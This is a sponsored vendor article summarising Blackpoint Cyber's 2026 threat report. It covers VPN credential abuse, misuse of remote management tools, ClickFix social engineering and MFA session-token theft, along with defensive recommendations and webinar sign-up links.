Remote access and trusted management tools play a key role in how organizations operate today. According to Blackpoint Cyber’s 2026 Annual Threat Report, they are also increasingly on the mind of how to start intrusions.
Informed by the analysis of thousands of security investigations conducted during the reporting period, the report highlights a change in attacker behavior. Rather than relying primarily on vulnerability exploitation, threat actors typically gain access by using valid credentials, legitimate tools, and common user-driven actions.
The report examines these patterns, documents when intervention work has been disrupted, and presents key protective factors derived from the analyzed incident response results observed throughout the year 2025.
Additional data and best practices will be covered during an upcoming live webinar hosted by Blackpoint Cyber.
➡️ Register here
Key Findings from the 2026 Annual Threat Report
Attackers Get In Through Legitimate Access Methods
In all of the incidents analyzed in the report, attackers are more likely to enter using legitimate access rather than exploiting a vulnerability as their first point of entry.
SSL VPN abuse accounted for 32.8 percent of all identified incidents, making it one of the most common areas of first intrusion. In many cases, malicious actors were authenticated using valid but vulnerable credentials, resulting in VPN sessions that appeared legitimate to security controls.
Once access is established, these sessions often provide extensive internal access, allowing attackers to quickly move to high-value systems without immediately triggering alerts.
Reliable IT Tools Used Against Organizations
The report also highlights the common exploitation of legitimate Remote Monitoring and Management tools as a means of access and persistence.
RMM abuse occurred in 30.3 percent of identified incidents, while ScreenConnect was present in more than 70 percent of malicious RMM cases. Because these tools are often used for general IT management, unauthorized installations often resembled expected work and were difficult to isolate without strong visibility.
The report notes that areas with multiple remote access devices in use are more likely to experience adverse conditions associated with existing devices.
Social Engineering, Not Exploitation, Drives Many Incidents
While formal access methods have enabled many intrusions, user interaction represents a major driver of incident volume.
Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identifiable incidents, making them the most common attack pattern documented in the report.
Instead of exploiting software vulnerabilities, these campaigns rely on deceptive information. Users are instructed to paste commands into the Windows Run dialog as part of what appears to be a verification step. Make use of built-in Windows tools, without downloading a common malware or exploit.
Cloud Access Focuses on Session Reuse After MFA
Multi-factor authentication is enabled in most of the cloud environments associated with the investigated incidents, however account compromises still occur.
Adversary-in-the-Middle phishing accounted for nearly 16 percent of the cloud account disables documented in the report. In these cases, the MFA worked as designed. Instead of bypassing authentication, attackers capture authenticated session tokens issued after successful MFA and reuse them to access cloud services.
From the point of view of the cloud platform, this function is aligned with the authorized session.
Many of the attacks described above begin with legitimate access. Next is where the real damage happens.
In a recent investigation, our SOC identified a new malware called Roadk1ll, which is designed to infiltrate systems using WebSocket-based connections and maintain access while mixing with network traffic.
Join Inside SOC Episode #002 to see how this attack progresses from initial access to environmental vulnerability.
Save your seat
What These Findings Mean for Defense Teams
Across industries, geographies, and types of attacks, the report highlights a consistent pattern: most successful intrusions rely on activity integrated into routine operations.
Rather than relying on new practices or advanced malware, attackers have exploited everyday workflows such as remote logins, trusted tools, and common user actions. Based on the attack chains analyzed, the report identifies several key defenses:
- Treat remote access as a high-risk, high-impact activity
- Maintain a complete inventory of authorized RMM tools and remove unused or legacy agents
- Restrict unauthorized software installation and restrict operation from user-specified directory
- Implement conditional access controls that assess device orientation, location, and time risk
These patterns have been documented across the most commonly targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction.
For teams interested in exploring how these intrusion patterns are being implemented, Blackpoint Cyber will review key findings, case examples, and countermeasures from the 2026 Annual Threat Report during an upcoming live webinar.
➡️ Sign up to receive the 2026 Annual Threat Report
Sponsored and written by Blackpoint Cyber.
